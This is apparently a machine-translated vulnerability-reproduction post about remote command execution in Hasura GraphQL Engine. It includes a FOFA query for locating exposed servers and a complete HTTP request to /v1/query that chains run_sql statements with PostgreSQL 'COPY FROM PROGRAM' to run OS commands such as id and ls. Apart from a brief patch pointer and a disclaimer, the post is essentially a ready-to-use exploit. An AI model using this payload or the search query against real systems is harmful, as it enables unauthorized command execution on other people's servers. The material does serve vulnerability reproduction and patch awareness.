Article directory
Hasura GraphQL Engine has a remote command execution vulnerability
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Introduction to Hasura GraphQL Engine
WeChat official account search: Nanfeng Vulnerability Reappearance Library
This article was first published on the Nanfeng Vulnerability Reproduction Library official account
Hasura GraphQL Engine is a very fast GraphQL server open sourced by Hasura.
2. Vulnerability description
Hasura GraphQL Engine is a very fast GraphQL server open sourced by Hasura. Hasura GraphQL Engine has a remote command execution vulnerability.
CVE number:
CNNVD number:
CNVD number:
3. Affect the version
Picture 1
4. fofa query statement
“Hasura GraphQL”
5. Vulnerability recurrence
Vulnerability link: http://127.0.0.1/v1/query
Vulnerability data package:
POST /v1/query HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Length: 352
Content-Type: application/x-www-form-urlencoded
{"type": "bulk", "args": [{"type": "run_sql", "args": {"sql": "SET LOCAL statement_timeout = 10000;", "cascade": false, "read_only": false}}, {"type": "run_sql", "args": {"sql": "DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM 'id';\nSELECT * FROM cmd_exec;", "cascade": false, "read_only": false}}]}
Execute the id command
Execute the ls command
6.POC&EXP
none
7. Rectification opinions
Pay attention to the manufacturer's upgrade patch to fix the vulnerability, the link to get the patch: https://github.com/hasura/graphql-engine/